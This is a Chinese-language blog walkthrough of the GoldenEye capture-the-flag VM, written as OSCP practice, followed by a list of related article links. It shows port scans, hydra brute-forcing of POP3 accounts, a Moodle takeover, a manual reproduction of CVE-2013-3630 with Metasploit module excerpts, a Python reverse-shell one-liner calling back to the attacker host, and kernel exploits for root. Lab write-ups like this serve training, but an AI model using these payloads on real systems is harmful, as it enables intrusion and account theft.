GoldenEye靶机work_through暨CVE-2013-3630复现
前言
备考OSCP,所以接下来会做一系列的OSCP向靶机来练手
靶机描述
I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.
Beta - 2018-05-02 v1 - 2018-05-04
信息搜集
nmap -sP 192.168.218.0/24
发现靶机IP 192.168.218.131
nmap -sV -A 192.168.218.131
Nmap scan report for 192.168.218.131
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after: 2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:06:CF:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.17 ms 192.168.218.131
访问80端口
得到提示,使用账号GOLDENEYE,top弱密码爆破/sev-home/实现登陆。
抓包看了一下
GET /sev-home/sev-home/ HTTP/1.1
Host: 192.168.218.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.218.131/
Upgrade-Insecure-Requests: 1
Authorization: Basic U2V2ZXJuYXlhOkdvbGRlbkV5ZQ==
Authorization: Basic base64(账号:密码)
写个脚本生成字典,intruder爆破无果。
import base64
url = 'http://192.168.218.131/sev-home/'
dic = 'F:/创新实践/dictionary/Web-Fuzzing-Box-main/Brute/Password/Top_Dev_Password.txt'
name = 'GOLDENEYE'
with open(dic, 'r') as f1:
with open('goldeneye.txt', 'a') as f2:
for line in f1:
passwd = line.strip()
plaintext = name + ':'+ passwd
ciphertext = base64.b64encode(plaintext.encode())
auth = 'Basic ' + ciphertext.decode()
f2.write(auth)
f2.write('\n')
重新回到页面,查看源代码。有一个terminal.js.注释部分如下
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
html实体编码的密码,给它解一下,为InvincibleHack3r
尝试用Boris和密码登陆,账号为boris时成功。
登入后又是一段文本
# GoldenEye
GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)
Please email a qualified GNO supervisor to receive the online **GoldenEye Operators Training** to become an Administrator of the GoldenEye system
Remember, since ***security by obscurity\*** is very effective, we have configured our pop3 service to run on a very high non-default port
在源码中发现注释Natalya和Boris,还是之前那俩
从文本看我们下一步要向主管发邮件,pop3端口在高端口处。
再用nmap扫一波全端口
nmap -sV -p- 192.168.218.131
Nmap scan report for 192.168.218.131
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open ssl/pop3 Dovecot pop3d
55007/tcp open pop3 Dovecot pop3d
MAC Address: 00:0C:29:06:CF:07 (VMware)
问题来了,smtp和pop3这俩邮件协议要有什么攻击姿势呢?
搜了一下,一是smtp 伪造邮件,二是pop3爆破。伪造邮件的主要问题在于这主管的邮箱地址是啥,supervisor@GoldenEye ?往哪儿发呢。先爆破pop3吧。
有msf的pop3_login模块爆破了一波boris,感觉太慢了。换成hydra吧
(先查了下kali的字典放在哪儿)
hydra -s 55007 -l boris -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
hydra -s 55007 -l natalya -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
得到结果:
boris secret1!
natalya bird
那么现在尝试登陆pop3,常用命令如下
命令 | 参数 | 使用在何种状态中 | 描述 |
---|---|---|---|
USER | Username | 认证 | 此命令与下面的pass命令若成功,将导致状态转换 |
PASS | Password | 认证 | 此命令若成功,状态转化为更新 |
APOP | Name,Digest | 认证 | Digest是MD5消息摘要 |
STAT | None | 处理 | 请求服务器发回关于邮箱的统计资料,如邮件总数和总字节数 |
UIDL | [Msg#](邮件号,下同) | 处理 | 返回邮件的唯一标识符,POP3会话的每个标识符都将是唯一的 |
LIST | [Msg#] | 处理 | 返回邮件的唯一标识符,POP3会话的每个标识符都将是唯一的 |
RETR | [Msg#] | 处理 | 返回由参数标识的邮件的全部文本 |
DELE | [Msg#] | 处理 | 服务器将由参数标识的邮件标记为删除,由QUIT命令执行 |
TOP | [Msg#] | 处理 | 服务器将返回由参数标识的邮件的邮件头+前n行内容,n必须是正整数 |
NOOP | None | 处理 | 服务器返回一个肯定的响应,用于测试连接是否成功 |
QUIT | None | 处理、认证 | *1)* 如果服务器处于“处理”状态,么将进入“更新”状态以删除任何标记为删除的邮件,并重返“认证”状态。*2)* 如果服务器处于“认证”状态,则结束会话,退出连接 |
boris下有3篇邮件
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: root@127.0.0.1.goldeneye
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id D9E47454B1
for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: 20180425022326.D9E47454B1@ubuntu
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: root@127.0.0.1.goldeneye
Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: natalya@ubuntu
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id C3F2B454B1
for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: 20180425024249.C3F2B454B1@ubuntu
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu
Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: alec@janus.boss
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id 4B9F4454B1
for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: 20180425025235.4B9F4454B1@ubuntu
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: alec@janus.boss
Boris,
Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!
Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....
PS - Keep security tight or we will be compromised.
换一个用户Natalya(登陆的时候要大写,也不知道为啥hydra小写也行)有两封邮件
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: root@ubuntu
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
by ubuntu (Postfix) with ESMTP id D5EDA454B1
for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: 20180425024542.D5EDA454B1@ubuntu
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu
Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.
Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: root@ubuntu
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 17C96454B1
for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: 20180425031956.17C96454B1@ubuntu
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu
Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle
Ok, user creds are:
username: xenia
password: RCP90rulez!
Boris verified her as a valid contractor so just create the account ok?
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....
Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
根据现在获得的线索,有一个新系统。host绑定靶机IP到severnaya-station.com
访问http://severnaya-station.com/gnocertdir
登陆后,wappalyzer识别为Moodle。点击site blogs标签发现版本2.2.3.
点击message发现与Dr Doak的消息,其中提到邮件账号doak,也爆破一下。等待的时候顺便搜一下Moodle都有啥公开漏洞。
登陆邮箱查看
成功得到账号,在加上刚才的搜索,怀疑是教师角色的RCE那个洞(CVE-2018-1133,但版本又对不上。
先登陆翻一翻再说——在 my private files 中得到s3cret.txt
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
图片如下,放大可以看到英文大意是藏了acess key
分析一下
base64这段解出来是xWinter1995x!,尝试登陆admin账号成功。
打点-getshell
想办法getshell.继续看exploit-db,发现有一个2013年的RCE,还是msf上有的exp。但OSCP不是只能在一台靶机上使用msf嘛,大致扫了一遍exp也就3个步骤,为了练习起见我们先手动跟一下exp流程(其实是msf没打通)。
1.更改spell engine
把Spell engine改成上图,第二个不用改
2.插入payload
post = {
'section' => 'systempaths',
'sesskey' => sesskey,
'return' => '',
's__gdversion' => '2',
's__pathtodu' => '/usr/bin/du',
's__aspellpath' => payload.encoded,
's__pathtodot' => ''
}
aspell = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/admin/settings.php'),
'vars_post' => post,
'cookie' => sess
})
spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")
我们先找到这个页面/admin/settings.php?section=systempaths
这里填的代码也不知道是给点提示还是我之前msf没打通留下的。
填入python弹shell的代码
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.218.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
3.真触发漏洞
spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")
resp = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'),
'data' => spellcheck,
'ctype' => 'application/json',
'cookie' => sess
})
if !resp or resp.code != 200
fail_with("Error triggering payload")
访问http://severnaya-station.com/gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php 通过hackbar发送exp的触发内容
成功接到反弹shell
后渗透-提权
照例先找suid提权
find / -perm -u=s -type f 2>/dev/null
本地python起一个http,靶机用wget下载Linux Exploit Suggester 2,给执行权限并执行
上传脏牛
因为没有gcc 用cc 编译执行
cc cowroot.c -o cowroot -pthread
./cowroot
然后执行ls /root卡住了。。访问网站发现打不开。giao,直接打挂了。
几经波折最终用https://www.exploit-db.com/exploits/37292拿到root
568628e0d993b1973adc718237da6e93
总结
这次的主要收获是对邮件协议pop3的攻击,getshell过程很普通,但是没有用msf——exp步骤清晰确实也不需要。拿到shell之后,提权的过程确实比预料的要废了很多波折。
GoldenEye靶机work_through暨CVE-2013-3630复现的更多相关文章
- CVE¬-2020-¬0796 漏洞复现(本地提权)
CVE-2020-0796 漏洞复现(本地提权) 0X00漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品 ...
- CVE 2019-0708 漏洞复现+
PART 1 参考链接:https://blog.csdn.net/qq_42184699/article/details/90754333 漏洞介绍: 当未经身份验证的攻击者使用 RDP 连接到目标 ...
- misdirection靶机work_through
web打点 nmap扫描 Nmap scan report for 192.168.218.135 Host is up (0.000014s latency). Not shown: 65531 c ...
- CVE 2019-0708漏洞复现防御修复
CVE-2019-0708 Windows再次被曝出一个破坏力巨大的高危远程漏洞CVE-2019-0708.攻击者一旦成功利用该漏洞,便可以在目标系统上执行任意代码,包括获取敏感信息.执行远程代码.发 ...
- Goldeneye 靶机过关记录
注:因记录时间不同,记录中1.111和1.105均为靶机地址. 1信息收集 1.1得到目标,相关界面如下: 1.2简单信息收集 wappalyzer插件显示: web服务器:Apache 2.4.7 ...
- LamPiao靶机work_through
前言 oscp靶机系列的第二篇.只追求做出来的话,这靶机蛮简单的.但是为了提升难度,尽量避免使用msf--毕竟考试只准用一次嘛,自己写了个exp. 正文 主机发现 nmap -sP 192.168.2 ...
- w1R3s靶机work_through
前言 这靶机挺简单的.虽然网友们有分享oscp向的靶机集,但是没有一个难度梯度,做起来就怪怪的. 打点 nmap -sP 192.168.218.0/24 发现主机IP 192.168.218.134 ...
- 搭建域环境,安装Exchange Server 2013,复现CVE-2019-1040
搭建域环境 操作系统: 域控:Windows server 2008 R2 域成员: Windows Server 2012 . Windows 7 对于将要安装成为DC的服务器来讲,其系统配置 ...
- MS17-010漏洞利用复现
MS17-010漏洞利用复现 准备环境: win7靶机 IP地址:172.16.15.118 Kali攻击机 IP地址:172.16.15.50 首先我们需要查看一下靶机是否开启445端口 打开kal ...
随机推荐
- React 17 All In One
React 17 All In One v17.0.1 https://reactjs.org/blog/2020/10/20/react-v17.html https://reactjs.org/b ...
- 编程术语 All In One
编程术语 All In One js 名词,术语 函数 函数签名 一个函数签名 (或类型签名,或方法签名) 定义了 函数 或 方法 的输入与输出. 一个签名可以包括: 参数 及参数的 类型 一个返回值 ...
- Python Coding Interview
Python Coding Interview Python Advanced Use enumerate() to iterate over both indices and values Debu ...
- Chrome DevTools & console & filter warning
Chrome DevTools & console & filter warning
- 超详细Openstack核心组件——nova部署
目录 OpenStack-nova组件部署 nova组件部署位置 计算节点Nova服务配置(CT配置) 计算节点配置Nova服务-c1节点配置 计算节点-c2(与c1相同)(除了IP地址) contr ...
- DOM的理解
https://www.cnblogs.com/djtang/p/11538420.html dom的理解 https://blog.csdn.net/jiuqiyuliang/article/de ...
- 5G组网方案:NSA和SA
目录 5G组网的8个选项 独立组网(SA) 选项1 选项2 选项5 选项6 总结 非独立组网(NSA) 选项3系列 选项3 选项3a 选项3x 选项7系列 选项4系列 选项8 演进路线 5G组网的8个 ...
- 00.从0实现一个JVM语言系列
00.一个JVM语言的诞生 由于方才才获悉博客园文章默认不放在首页的, 原创文章主要通过随笔显示, 所以将文章迁移到随笔; 这篇帖子将后续更新, 欢迎关注! 这段时间要忙着春招实习, 所以项目更新会慢 ...
- 【HTB系列】 靶机Swagshop的渗透测试详解
出品|MS08067实验室(www.ms08067.com) 本文作者:是大方子(Ms08067实验室核心成员) 总结与反思 使用vi提权 magento漏洞的利用 magescan 工具的使用 靶机 ...
- free命令查看内存
[root@jojo ~]# free -h total used free shared buff/cache available Mem: 991M 273M 64M 1.1M 653M 535M ...